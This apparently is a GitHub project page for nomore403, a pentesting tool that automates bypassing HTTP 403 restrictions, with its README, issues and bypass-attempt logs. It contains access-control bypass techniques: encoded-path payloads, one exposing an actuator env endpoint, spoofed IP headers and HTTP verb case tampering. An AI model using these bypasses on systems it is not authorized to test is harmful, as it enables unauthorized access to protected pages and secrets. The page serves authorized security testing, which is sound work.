devploit / nomore403

Tool to bypass 403/40X response codes.

License: MIT License

Go 100.00%
waf-bypass pentesting websec bugbounty ctf 403 403-bypass bypass

nomore403's Introduction

NoMore403


Introduction

nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.

Prerequisites

Before you install and run nomore403, make sure you have the following:

  • Go 1.15 or higher installed on your machine.

Installation

From Releases

Grab the latest release for your OS from our Releases page.

Compile from Source

If you prefer to compile the tool yourself:

git clone https://github.com/devploit/nomore403
cd nomore403
go get
go build

Customization

To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.

Usage

Output example

    ________  ________  ________  ________  ________  ________  ________  ________  ________
   ╱     ╱  ╲╱        ╲╱    ╱   ╲╱        ╲╱        ╲╱        ╲╱    ╱   ╲╱        ╲╱__      ╲
  ╱         ╱    ╱    ╱         ╱    ╱    ╱    ╱    ╱       __╱         ╱    ╱    ╱__       ╱
 ╱         ╱         ╱         ╱         ╱        _╱       __/____     ╱         ╱         ╱
 ╲__╱_____╱╲________╱╲__╱__╱__╱╲________╱╲____╱___╱╲________╱    ╱____╱╲________╱╲________╱  

Target: 		https://domain.com/admin
Headers:                false
Proxy:                  false
User Agent:             Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; 1ButtonTaskbar)
Method:                 GET
Payloads folder:        payloads
Custom bypass IP:       false
Follow Redirects:       false
Rate Limit detection:   false
Verbose:                false

━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━
403 	  429 bytes https://domain.com/admin

━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━

━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━
200 	 2047 bytes https://domain.com/;///..admin

━━━━━━━━━━━━━ HTTP VERSIONS ━━━━━━━━━━━━━━━
403      429 bytes HTTP/1.0
403      429 bytes HTTP/1.1
403      429 bytes HTTP/2

━━━━━━━━━━━━━ CASE SWITCHING ━━━━━━━━━━━━━━
200 	 2047 bytes https://domain.com/%61dmin

Basic Usage

./nomore403 -u https://domain.com/admin

Verbose Mode + Proxy

./nomore403 -u https://domain.com/admin -x http://127.0.0.1:8080 -v

Parse request from Burp

./nomore403 --request-file request.txt

Use custom header + specific IP address for bypasses

./nomore403 -u https://domain.com/admin -H "Environment: Staging" -i 8.8.8.8

Set new max of goroutines + add delay between requests

./nomore403 -u https://domain.com/admin -m 10 -d 200

Options

./nomore403 -h
Command line application that automates different ways to bypass 40X codes.

Usage:
  nomore403 [flags]

Flags:
  -i, --bypass-ip string      Use a specified IP address or hostname for bypassing access controls. Injects this IP in headers like 'X-Forwarded-For'.
  -d, --delay int             Specify a delay between requests in milliseconds. Helps manage request rate (default: 0ms).
  -f, --folder string         Specify the folder location for payloads if not in the same directory as the executable.
  -H, --header strings        Add one or more custom headers to requests. Repeatable flag for multiple headers.
  -h, --help                  help for nomore403
      --http                  Use HTTP instead of HTTPS for requests defined in the request file.
  -t, --http-method string    Specify the HTTP method for the request (e.g., GET, POST). Default is 'GET'.
  -m, --max-goroutines int    Limit the maximum number of concurrent goroutines to manage load (default: 50). (default 50)
      --no-banner             Disable the display of the startup banner (default: banner shown).
  -x, --proxy string          Specify a proxy server for requests, e.g., 'http://server:port'.
      --random-agent          Enable the use of a randomly selected User-Agent.
  -l, --rate-limit            Halt requests upon encountering a 429 (rate limit) HTTP status code.
  -r, --redirect              Automatically follow redirects in responses.
      --request-file string   Load request configuration and flags from a specified file.
      --timeout int           Specify a max timeout time in ms (default 6000)
  -u, --uri string            Specify the target URL for the request.
  -a, --user-agent string     pecify a custom User-Agent string for requests (default: 'nomore403').
  -v, --verbose               Enable verbose output for detailed request/response logging.

Contributing

We welcome contributions of all forms. Here's how you can help:

  • Report bugs and suggest features.
  • Submit pull requests with bug fixes and new features.

Security Considerations

While nomore403 is designed for educational and ethical testing purposes, it's important to use it responsibly and with permission on target systems. Please adhere to local laws and guidelines.

License

nomore403 is released under the MIT License. See the LICENSE file for details.

Contact

Twitter: devploit


nomore403's Issues

Tool Crash

[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x468041]
goroutine 1 [running]:
fmt.(*buffer).writeString(...)
/usr/lib/go-1.19/src/fmt/print.go:82
fmt.(*fmt).padString(0x41b7c6?, {0x0, 0x13})
/usr/lib/go-1.19/src/fmt/format.go:110 +0x247
fmt.(*fmt).fmtS(0xc0002d00d0?, {0x0?, 0xc00010c800?})
/usr/lib/go-1.19/src/fmt/format.go:359 +0x3f
fmt.(*pp).fmtString(0x4f4bc6?, {0x0?, 0xc0004429e9?}, 0x0?)
/usr/lib/go-1.19/src/fmt/print.go:474 +0x86
fmt.(*pp).printArg(0xc0002d00d0, {0x7e7bc0?, 0xc0004729a0}, 0x76)
/usr/lib/go-1.19/src/fmt/print.go:725 +0x21e
fmt.(*pp).doPrintf(0xc0002d00d0, {0xc000442a07, 0x9}, {0xc00010cac8?, 0x3, 0x3})
/usr/lib/go-1.19/src/fmt/print.go:1057 +0x288
fmt.Fprintf({0x919d00, 0xc000706580}, {0xc000442a07, 0x9}, {0xc00010cac8, 0x3, 0x3})
/usr/lib/go-1.19/src/fmt/print.go:204 +0x75
github.com/cheynewallace/tabby.(*Tabby).AddLine(0xc000014008, {0xc00010cac8, 0x3, 0x3})
/root/go/pkg/mod/github.com/cheynewallace/[email protected]/tabby.go:31 +0x59
dontgo403/cmd.printResponse({0xc00092e000, 0x550, 0xc0000264ac?})
/home/dontgo403/cmd/requester.go:36 +0x2f6
dontgo403/cmd.requestHeaders({0xc0003ee4e0, 0x2f}, {0xc0005926e0, 0x1, 0x1}, 0xc000169b90, {0x0, 0x0}, {0x7ffcc82d3310, 0xe}, ...)
/home/dontgo403/cmd/requester.go:136 +0x2d3
dontgo403/cmd.requester({0xc000129919, 0x2e}, {0x0?, 0x0?}, {0x7ffcc82d3322, 0x6f}, {0xc000037100, 0x1, 0x0?}, {0x0, ...}, ...)
/home/dontgo403/cmd/requester.go:291 +0x385
dontgo403/cmd.glob..func1(0xb7bd80?, {0x861224?, 0x6?, 0x6?})
/home/dontgo403/cmd/root.go:48 +0x31c
github.com/spf13/cobra.(*Command).execute(0xb7bd80, {0xc000024080, 0x6, 0x6})
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:876 +0x67b
github.com/spf13/cobra.(*Command).ExecuteC(0xb7bd80)
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:990 +0x3bd
github.com/spf13/cobra.(*Command).Execute(...)
/root/go/pkg/mod/github.com/spf13/[email protected]/command.go:918
dontgo403/cmd.Execute()
/home/dontgo403/cmd/root.go:63 +0x25
main.main()
/home/dontgo403/main.go:22 +0x17

is urlencode(random path strings) to dontgo403?

For example, we want to bypass the actuator/env endpoint

curl http://[MASK].com/actuator/env

Use dontgo403 (default config)

curl http://[MASK].com/actuator/env;%2f..%2f..

Response: 403 Forbidden

When we add urlencode(some sensitive files), /actuator/env

curl http://[MASK].com/act%75ato/env;%2f..%2f..

Response:

 {
  "activeProfiles" : [ "dev" ],
  "propertySources" : [ {
  .....

Maybe this method can bypass some incorrect nginx configuration.

My tools support this feature, but I think your tool is better than mine in terms of coding structure and practicality. If I had found your tool earlier, I wouldn't have reinvented the wheel. LOL


I hope you will consider adding this feature.
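
A defender's view of the encoded-path requests shown on this page (`act%75ator`, `%61dmin`, `%2e/admin`), as an added Go example that is not part of the issue or of nomore403's code: a gate that matches the raw path misses them, while one that canonicalizes first and fails closed does not. The prefix policy, the function names and the normalization order (drop `;` parameters, decode once, resolve dot segments, fold case) are assumptions about the backend.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path"
	"strings"
)

// protectedPrefixes is a constructed policy for this example (lower case,
// because canonicalize folds case).
var protectedPrefixes = []string{"/admin", "/actuator"}

var errAmbiguous = errors.New("ambiguous path")

// hasProtectedPrefix reports whether p is a protected path or lies below one.
func hasProtectedPrefix(p string) bool {
	for _, prefix := range protectedPrefixes {
		if p == prefix || strings.HasPrefix(p, prefix+"/") {
			return true
		}
	}
	return false
}

// naiveIsProtected models a front-end rule that matches the raw request
// path byte for byte, before any decoding.
func naiveIsProtected(rawPath string) bool {
	return hasProtectedPrefix(rawPath)
}

// hasControl reports whether s contains an ASCII control byte.
func hasControl(s string) bool {
	for i := 0; i < len(s); i++ {
		if s[i] < 0x20 || s[i] == 0x7f {
			return true
		}
	}
	return false
}

// canonicalize rewrites rawPath the way this example assumes the backend
// routes it: split on literal "/", drop ";parameters" from each segment,
// percent-decode once, resolve "." and "..", then fold case.
func canonicalize(rawPath string) (string, error) {
	if !strings.HasPrefix(rawPath, "/") {
		return "", errAmbiguous
	}
	segments := strings.Split(rawPath, "/")
	for i, seg := range segments {
		if j := strings.IndexByte(seg, ';'); j >= 0 {
			seg = seg[:j] // path parameters never take part in routing
		}
		decoded, err := url.PathUnescape(seg)
		if err != nil {
			return "", fmt.Errorf("%w: %v", errAmbiguous, err)
		}
		// After one decode a segment must not hide a separator, a
		// parameter marker, a second layer of encoding or a control byte.
		if strings.ContainsAny(decoded, "/\\%;") || hasControl(decoded) {
			return "", errAmbiguous
		}
		segments[i] = decoded
	}
	return strings.ToLower(path.Clean(strings.Join(segments, "/"))), nil
}

// strictIsProtected applies the policy to the canonical path and fails
// closed: a path that cannot be canonicalized is treated as protected.
func strictIsProtected(rawPath string) bool {
	canon, err := canonicalize(rawPath)
	if err != nil {
		return true
	}
	return hasProtectedPrefix(canon)
}

func main() {
	// Request paths quoted on this page, plus one constructed public path.
	samples := []string{
		"/admin",
		"/%61dmin",
		"/%2e/admin/",
		"/actuator/env;%2f..%2f..",
		"/act%75ator/env;%2f..%2f..",
		"/%252f/admin/",
		"/public/index.html", // constructed
	}
	fmt.Printf("%-30s %-6s %-6s %s\n", "raw path", "naive", "strict", "canonical")
	for _, p := range samples {
		canon, err := canonicalize(p)
		if err != nil {
			canon = "(rejected)"
		}
		fmt.Printf("%-30s %-6t %-6t %s\n", p, naiveIsProtected(p), strictIsProtected(p), canon)
	}
}
```

The check only holds if the gate and the backend agree on the path, so the gate should either reject any request whose raw path differs from its canonical form or forward the canonical form.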

Errors

Hi,

The tool is super cool and super fast, and I really appreciate the time taken to create it. But I am facing some issues with this tool. The first issue: when I run the tool it works fine, but when it gets to the CUSTOM PATHS exploit it shows me this error:
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x7518b4]

goroutine 2396 [running]:
dontgo403/cmd.requestMidPaths.func1({0xc000fcb2dc, 0x4})
/opt/tools/dontgo403/cmd/requester.go:268 +0x474
created by dontgo403/cmd.requestMidPaths
/opt/tools/dontgo403/cmd/requester.go:250 +

The second issue is that sometimes the tool works fine, but it gives me this error:
2022/01/18 22:00:34 Patch "https://www.google.com/": dial tcp: i/o timeout

Tag the source

It would be very helpful if you could tag releases as well. This would enable distributions to fetch the source from GitHub instead of working with git checkouts.

Thanks

Flags

@devploit Needed some functionality like -r for redirect (optional), and also an argument to avoid the host if it throws a 429 status code.

Ability to specify custom payload position(s)

Currently, the payload position defaults to the end of the URL. Being able to specify a custom payload position would be beneficial in certain cases.

For example:
./nomore -u example.com/organization/100/user/200?foo=bar

In this case, one may want to target the "organization ID" (100) and/or the "user ID" (200) instead of inserting payloads at the end.

An added bonus would be if it was possible to specify multiple positions.

panic: runtime error: index out of range [1] with length 1

Fails to parse request from Burp:

./dontgo403 -r /home/kali/tmp/req 
panic: runtime error: index out of range [1] with length 1

goroutine 1 [running]:
dontgo403/cmd.requester({0xc00016a100, 0x7d}, {0x0?, 0x0?}, {0x0, 0x0}, {0xc00017e400?, 0x10, 0x10}, {0x0, ...}, ...)
	/home/kali/hacktools/web/dontgo403/cmd/requester.go:393 +0x747
dontgo403/cmd.loadFlagsFromRequestFile({0x7fffd2c94fb1?, 0x0?}, 0x0, 0x0?)
	/home/kali/hacktools/web/dontgo403/cmd/api.go:139 +0x305
dontgo403/cmd.glob..func1(0xb7cd00?, {0x860f2b?, 0x2?, 0x2?})
	/home/kali/hacktools/web/dontgo403/cmd/root.go:57 +0x291
github.com/spf13/cobra.(*Command).execute(0xb7cd00, {0xc00011c160, 0x2, 0x2})
	/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:876 +0x67b
github.com/spf13/cobra.(*Command).ExecuteC(0xb7cd00)
	/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:990 +0x3bd
github.com/spf13/cobra.(*Command).Execute(...)
	/home/kali/go/pkg/mod/github.com/spf13/[email protected]/command.go:918
dontgo403/cmd.Execute()
	/home/kali/hacktools/web/dontgo403/cmd/root.go:75 +0x25
main.main()
	/home/kali/hacktools/web/dontgo403/main.go:22 +0x17

Here is the request:

cat ~/tmp/req 
POST /openai/deployments/text-gpt-4-32k/chat/completions?api-version=2023-03-15-preview HTTP/1.1
Host: cdo-eastus-openai.openai.azure.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Te: trailers
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Connection: close

DoS issue

When I try to bypass a 403 it sends lots of requests, so a low-bandwidth server can't handle those requests.

Regarding the issue of release versions

Why bother packaging a release at all if the payloads are not included in the releases package? And the file in your releases is actually 8M in size? What exactly is in it?

HTTP VeRbS and Case Sensitivity

Hello,

Thanks for your Great Work!

Is it possible to add HTTP VERB TAMPERING methods using case-sensitivity manipulation?
Like:
GeT, gEt, poST, PosT, etc.?

Use case:

------------------------CTF--------------------
cat /var/www/html/admin/.htaccess 
<If "%{REQUEST_METHOD} == 'HEAD' || %{REQUEST_METHOD} == 'OPTIONS' || %{REQUEST_METHOD} == 'PATCH' ||  %{REQUEST_METHOD} == 'GET' || %{REQUEST_METHOD} == 'POST' || %{REQUEST_METHOD} == 'PUT' || %{REQUEST_METHOD} == 'DELETE' || %{REQUEST_METHOD} == 'TRACE'"> 

deny from all
</If>
#</Directory>
-------------------------------------------------
WooZooO@Priv:~$ curl -X POST http://172.16.67.124/admin/index.php -I
HTTP/1.1 403 Forbidden
Date: Tue, 19 Mar 2024 05:56:01 GMT
Server: Apache
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1

WooZooO@Priv:~$ curl -X PoST http://172.16.67.124/admin/index.php -I
HTTP/1.1 200 OK
Date: Tue, 19 Mar 2024 05:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Content-Length: 96
Content-Type: text/html; charset=UTF-8

AFAIK the current version of "nomore403" doesn't use these methods:

./nomore403 --random-agent -i "192.168.12.12" -v -u http://172.16.67.124/admin/ -r --random-agent  -H "Hello: Cookie"

    ________  ________  ________  ________  ________  ________  ________  ________  ________
   ╱     ╱  ╲╱        ╲╱    ╱   ╲╱        ╲╱        ╲╱        ╲╱    ╱   ╲╱        ╲╱__      ╲
  ╱         ╱    ╱    ╱         ╱    ╱    ╱    ╱    ╱       __╱         ╱    ╱    ╱__       ╱
 ╱         ╱         ╱         ╱         ╱        _╱       __/____     ╱         ╱         ╱
 ╲__╱_____╱╲________╱╲__╱__╱__╱╲________╱╲____╱___╱╲________╱    ╱____╱╲________╱╲________╱                                   
	
Target: 		http://172.16.67.124/admin/
Headers: 		{User-Agent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15}
Headers: 		{Hello  Cookie}
Proxy: 			false
User Agent: 		Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15
Method: 		GET
Payloads folder: 	payloads
Custom bypass IP: 	192.168.12.12
Follow Redirects: 	true
Rate Limit detection: 	false
Verbose: 		true

━━━━━━━━━━━━━ DEFAULT REQUEST ━━━━━━━━━━━━━
403 	  372 bytes http://172.16.67.124/admin/

━━━━━━━━━━━━━ VERB TAMPERING ━━━━━━━━━━━━━━
200 	  393 bytes TRACE
403 	  372 bytes COPY
400 	  392 bytes CONNECT
403 	  372 bytes VERSION-CONTROL
403 	  372 bytes OPTIONS
403 	  372 bytes PUT
403 	  372 bytes POUET
403 	  372 bytes TRACK
403 	  372 bytes POST
403 	  372 bytes MOVE
403 	  372 bytes PATCH
403 	  143 bytes HEAD
403 	  372 bytes LABEL
403 	  372 bytes GET
403 	  372 bytes UNCHECKOUT
403 	  372 bytes DELETE
403 	  372 bytes LOCK
403 	  372 bytes UPDATE

━━━━━━━━━━━━━ HEADERS ━━━━━━━━━━━━━━━━━━━━━
403 	  372 bytes Request-Uri: 192.168.12.12
403 	  372 bytes Referrer: 192.168.12.12
403 	  372 bytes X-Forwarded-Proto: 192.168.12.12
403 	  372 bytes Referer: 192.168.12.12
403 	  372 bytes X-Forwarded-Host: 192.168.12.12
403 	  372 bytes Redirect: 192.168.12.12
403 	  372 bytes X-Forwarded-For-Original: 192.168.12.12
403 	  372 bytes Proxy-Host: 192.168.12.12
403 	  372 bytes X-Referrer: 192.168.12.12
403 	  372 bytes Proxy: 192.168.12.12
403 	  372 bytes Proxy-Url: 192.168.12.12
403 	  372 bytes Real-Ip: 192.168.12.12
403 	  372 bytes X-Forwarded-For: 192.168.12.12
403 	  372 bytes X-Remote-Addr: 192.168.12.12
403 	  372 bytes X-Originating-IP: 192.168.12.12
403 	  372 bytes Http-Url: 192.168.12.12
403 	  372 bytes X-Forwarded-By: 192.168.12.12
403 	  372 bytes X-Proxy-Url: 192.168.12.12
403 	  372 bytes X-ProxyUser-Ip: 192.168.12.12
403 	  372 bytes X-Forwarded: 192.168.12.12
403 	  372 bytes Forwarded-For-Ip: 192.168.12.12
403 	  372 bytes Profile: 192.168.12.12
403 	  372 bytes Origin: 192.168.12.12
403 	  372 bytes X-Real-IP: 192.168.12.12
403 	  372 bytes Host: 192.168.12.12
403 	  372 bytes X-Original-URL: 192.168.12.12
403 	  372 bytes Forwarded-For: 192.168.12.12
403 	  372 bytes X-Forward-For: 192.168.12.12
403 	  372 bytes X-Original-Remote-Addr: 192.168.12.12
403 	  372 bytes X-Forward: 192.168.12.12
403 	  372 bytes X-HTTP-Host-Override: 192.168.12.12
403 	  372 bytes X-Host: 192.168.12.12
403 	  372 bytes X-HTTP-DestinationURL: 192.168.12.12
403 	  372 bytes X-Originally-Forwarded-For: 192.168.12.12
403 	  372 bytes X-Forwarded-Server: 192.168.12.12
403 	  372 bytes X-Forwarder-For: 192.168.12.12
403 	  372 bytes Uri: 192.168.12.12
403 	  372 bytes Forwarded: 192.168.12.12
403 	  372 bytes Client-IP: 192.168.12.12
403 	  372 bytes True-Client-IP: 192.168.12.12
403 	  372 bytes Destination: 192.168.12.12
403 	  372 bytes X-Arbitrary: 192.168.12.12
403 	  372 bytes CF-Connecting_IP: 192.168.12.12
403 	  372 bytes X-Custom-IP-Authorization: 192.168.12.12
403 	  372 bytes Access-Control-Allow-Origin: 192.168.12.12
403 	  372 bytes Base-Url: 192.168.12.12
403 	  372 bytes X-Client-IP: 192.168.12.12
403 	  372 bytes Url: 192.168.12.12
403 	  372 bytes CF-Connecting-IP: 192.168.12.12
403 	  372 bytes X-Remote-IP: 192.168.12.12
403 	  372 bytes X-Rewrite-URL: 192.168.12.12
403 	  372 bytes X-WAP-Profile: 192.168.12.12
403 	  372 bytes X-Real-Ip: 192.168.12.12
403 	  372 bytes X-HTTP-Method-Override POST
403 	  372 bytes X-True-IP: 192.168.12.12
403 	  372 bytes Referer /admin
403 	  372 bytes X-Rewrite-URL /admin
403 	  372 bytes X-Forwarded-Port 80
403 	  372 bytes X-Override-URL /admin
403 	  372 bytes X-Forwarded-Port 8443
403 	  372 bytes X-Forwarded-Port 8080
403 	  372 bytes X-Forwarded-Port 4443
403 	  372 bytes X-Forwarded-Port 443
403 	  372 bytes X-Original-URL /admin
403 	  372 bytes X-HTTP-Method-Override PUT

━━━━━━━━━━━━━ CUSTOM PATHS ━━━━━━━━━━━━━━━━
403 	  373 bytes http://172.16.67.124/admin/1
403 	  372 bytes http://172.16.67.124/admin//.
403 	  372 bytes http://172.16.67.124/admin/?
403 	  372 bytes http://172.16.67.124/admin/??
403 	  376 bytes http://172.16.67.124/admin/.svc
403 	  377 bytes http://172.16.67.124/admin/.wsdl
403 	  376 bytes http://172.16.67.124/admin/.svc?wsdl
403 	  372 bytes http://172.16.67.124/admin//
403 	  373 bytes http://172.16.67.124/admin/0
403 	  372 bytes http://172.16.67.124/admin///
403 	  375 bytes http://172.16.67.124/admin/..;
403 	  372 bytes http://172.16.67.124/admin/./
403 	  376 bytes http://172.16.67.124/admin/..\;
403 	  372 bytes http://172.16.67.124/admin//
403 	  376 bytes http://172.16.67.124/admin/.css
403 	  377 bytes http://172.16.67.124/admin/.html
403 	  373 bytes http://172.16.67.124/admin/%61
403 	  372 bytes http://172.16.67.124/admin/.
403 	  373 bytes http://172.16.67.124/admin/-
403 	  372 bytes http://172.16.67.124/admin/?debug=true
403 	  372 bytes http://172.16.67.124/admin/?
403 	  377 bytes http://172.16.67.124/admin/&
403 	  372 bytes http://172.16.67.124/admin/??
403 	  372 bytes http://172.16.67.124/admin/?WSDL
403 	  372 bytes http://172.16.67.124/admin/?debug=1
403 	  377 bytes http://172.16.67.124/admin/.json
403 	  372 bytes http://172.16.67.124/admin///
403 	  372 bytes http://172.16.67.124/admin/???
403 	  379 bytes http://172.16.67.124/admin/.random
403 	  376 bytes http://172.16.67.124/admin/\/\/
403 	  377 bytes http://172.16.67.124/admin/debug
403 	  376 bytes http://172.16.67.124/admin/.php
403 	  372 bytes http://172.16.67.124/admin/?testparam
403 	  373 bytes http://172.16.67.124/admin/~
403 	  372 bytes http://172.16.67.124/admin/?param
403 	  374 bytes http://172.16.67.124/admin/%20/
403 	  373 bytes http://172.16.67.124/admin/%20
403 	  373 bytes http://172.16.67.124/admin/%0D
403 	  373 bytes http://172.16.67.124/admin/%0A
404 	  368 bytes http://172.16.67.124/admin/%00
403 	  373 bytes http://172.16.67.124/admin/%09
403 	  372 bytes http://172.16.67.124/admin/#test
403 	  372 bytes http://172.16.67.124/admin/#
403 	  375 bytes http://172.16.67.124/admin/°/
403 	  376 bytes http://172.16.67.124/admin/..;/
403 	  372 bytes http://172.16.67.124/admin/#/./
403 	  372 bytes http://172.16.67.124/admin/#/
403 	  376 bytes http://172.16.67.124/admin//..;/
403 	  377 bytes http://172.16.67.124/admin/..\;/
403 	  373 bytes http://172.16.67.124/admin/~
403 	  372 bytes http://172.16.67.124/admin//./
403 	  373 bytes http://172.16.67.124/admin//*
403 	  377 bytes http://172.16.67.124/admin/false
403 	  376 bytes http://172.16.67.124/admin//..%3B/
404 	  376 bytes http://172.16.67.124/admin/;%2f..%2f..%2f
403 	  373 bytes http://172.16.67.124/admin/%3f
403 	  377 bytes http://172.16.67.124/admin/%26
403 	  373 bytes http://172.16.67.124/admin/%23
403 	  373 bytes http://172.16.67.124/admin/%25
403 	  376 bytes http://172.16.67.124/admin/null
403 	  376 bytes http://172.16.67.124/admin/true
403 	  372 bytes http://172.16.67.124/%2e/admin/
404 	  372 bytes http://172.16.67.124/%252f/admin/
404 	  369 bytes http://172.16.67.124/%20admin/
404 	  370 bytes http://172.16.67.124/%20/admin/
404 	  369 bytes http://172.16.67.124/%23admin/
404 	  374 bytes http://172.16.67.124/%252f%252fadmin/
404 	  370 bytes http://172.16.67.124/%23%3fadmin/
404 	  367 bytes http://172.16.67.124/%admin/
404 	  369 bytes http://172.16.67.124/%09admin/
404 	  371 bytes http://172.16.67.124/%09..admin/
404 	  370 bytes http://172.16.67.124/%09;admin/
404 	  369 bytes http://172.16.67.124/%2fadmin/
404 	  371 bytes http://172.16.67.124/%2f%20%23admin/
404 	  370 bytes http://172.16.67.124/%2f%23admin/
404 	  370 bytes http://172.16.67.124/%2f%2fadmin/
404 	  371 bytes http://172.16.67.124/%2f%3b%2fadmin/
200 	 3427 bytes http://172.16.67.124/#admin/
404 	  364 bytes http://172.16.67.124/..%00/admin/
404 	  372 bytes http://172.16.67.124/%3b%2f%2e.admin/
404 	  377 bytes http://172.16.67.124/%3b%2f%2e%2e%2f%2e%2e%2f%2fadmin/
404 	  372 bytes http://172.16.67.124/%3b%2f..admin/
404 	  373 bytes http://172.16.67.124/%26admin/
404 	  369 bytes http://172.16.67.124/%2eadmin/
200 	 3427 bytes http://172.16.67.124/#?admin/
404 	  370 bytes http://172.16.67.124/%09%3badmin/
404 	  370 bytes http://172.16.67.124/%2e%2eadmin/
404 	  371 bytes http://172.16.67.124/%2e%2e%2fadmin/
400 	  392 bytes http://172.16.67.124/%2e%2e/admin/
404 	  373 bytes http://172.16.67.124/&admin/
404 	  370 bytes http://172.16.67.124/..admin/
400 	  392 bytes http://172.16.67.124/.%2e/admin/
404 	  370 bytes http://172.16.67.124/%3f%23admin/
404 	  370 bytes http://172.16.67.124/%3f%3fadmin/
404 	  377 bytes http://172.16.67.124/%3b/%2e%2e/..%2f%2fadmin/
404 	  372 bytes http://172.16.67.124/%3b/%2e.admin/
404 	  372 bytes http://172.16.67.124/..%0d/admin/
404 	  369 bytes http://172.16.67.124/%3fadmin/
404 	  372 bytes http://172.16.67.124/%3b/..admin/
404 	  375 bytes http://172.16.67.124/%3b//%2f../admin/
404 	  370 bytes http://172.16.67.124/%3b%09admin/
404 	  369 bytes http://172.16.67.124/%3badmin/
404 	  370 bytes http://172.16.67.124/%2f/admin/
404 	  371 bytes http://172.16.67.124/..%09admin/
404 	  370 bytes http://172.16.67.124/%2f%3fadmin/
404 	  375 bytes http://172.16.67.124/%3b/%2f%2f../admin/
404 	  372 bytes http://172.16.67.124/%2f%3b%2f%2fadmin/
404 	  371 bytes http://172.16.67.124/%2f%3f/admin/
404 	  364 bytes http://172.16.67.124/..%00;/admin/
404 	  371 bytes http://172.16.67.124/..%3Badmin/
404 	  371 bytes http://172.16.67.124/..%2fadmin/
404 	  372 bytes http://172.16.67.124/%3b%2f%2e%2eadmin/
400 	  392 bytes http://172.16.67.124/../admin/
404 	  373 bytes http://172.16.67.124/..%0d;/admin/
403 	  372 bytes http://172.16.67.124/.//./admin/
404 	  364 bytes http://172.16.67.124/..%00/;admin/
400 	  392 bytes http://172.16.67.124/.././admin/
404 	  371 bytes http://172.16.67.124/.;/admin/
404 	  373 bytes http://172.16.67.124/..%ff/;admin/
404 	  372 bytes http://172.16.67.124/..%5c/admin/
404 	  371 bytes http://172.16.67.124/..%5cadmin/
404 	  373 bytes http://172.16.67.124/..;%ff/admin/
404 	  373 bytes http://172.16.67.124/..;%0d/admin/
404 	  365 bytes http://172.16.67.124/..;%00/admin/
404 	  371 bytes http://172.16.67.124/..%ffadmin/
404 	  372 bytes http://172.16.67.124/.\;/admin/
404 	  371 bytes http://172.16.67.124//%252fadmin/
404 	  370 bytes http://172.16.67.124//%2e%2eadmin/
404 	  372 bytes http://172.16.67.124//%252e/admin/
404 	  375 bytes http://172.16.67.124//%252e%253b/admin/
404 	  375 bytes http://172.16.67.124//%252e%252f/admin/
404 	  373 bytes http://172.16.67.124/..%0d/;admin/
404 	  373 bytes http://172.16.67.124/..;\;admin/
404 	  372 bytes http://172.16.67.124/..\;admin/
404 	  373 bytes http://172.16.67.124/..;\\admin/
404 	  372 bytes http://172.16.67.124/..\\admin/
403 	  372 bytes http://172.16.67.124/./admin/
404 	  369 bytes http://172.16.67.124/./.admin/
404 	  372 bytes http://172.16.67.124/..;/admin/
403 	  372 bytes http://172.16.67.124//admin/
404 	  371 bytes http://172.16.67.124/..;admin/
404 	  373 bytes http://172.16.67.124/.jsonadmin/
404 	  371 bytes http://172.16.67.124//%20%20/admin/
403 	  377 bytes http://172.16.67.124/.htmladmin/
404 	  363 bytes http://172.16.67.124//%20#admin/
404 	  378 bytes http://172.16.67.124//%252e%252e%253b/admin/
400 	  392 bytes http://172.16.67.124//%2e%2e/admin/
404 	  372 bytes http://172.16.67.124//%2e%2e%3b/admin/
404 	  371 bytes http://172.16.67.124//%2e%3b/admin/
404 	  378 bytes http://172.16.67.124//%252e%252e%252f/admin/
404 	  371 bytes http://172.16.67.124//%2e%3b//admin/
404 	  371 bytes http://172.16.67.124//%2e%2f/admin/
404 	  373 bytes http://172.16.67.124/..%ff;/admin/
404 	  369 bytes http://172.16.67.124//%2fadmin/
404 	  370 bytes http://172.16.67.124//%3b/admin/
403 	  372 bytes http://172.16.67.124//%2e//admin/
404 	  371 bytes http://172.16.67.124//..%2fadmin/
404 	  369 bytes http://172.16.67.124//*admin/
404 	  370 bytes http://172.16.67.124//*/admin/
403 	  372 bytes http://172.16.67.124//%2e/admin/
404 	  370 bytes http://172.16.67.124//%20%23admin/
404 	  369 bytes http://172.16.67.124//.admin/
400 	  392 bytes http://172.16.67.124//../admin/
404 	  370 bytes http://172.16.67.124//..admin/
403 	  372 bytes http://172.16.67.124//../../..//admin/
400 	  392 bytes http://172.16.67.124//../..//../admin/
400 	  392 bytes http://172.16.67.124//../..;/admin/
404 	  374 bytes http://172.16.67.124//..%2f..%2fadmin/
400 	  392 bytes http://172.16.67.124//../;/../admin/
400 	  392 bytes http://172.16.67.124//..//../admin/
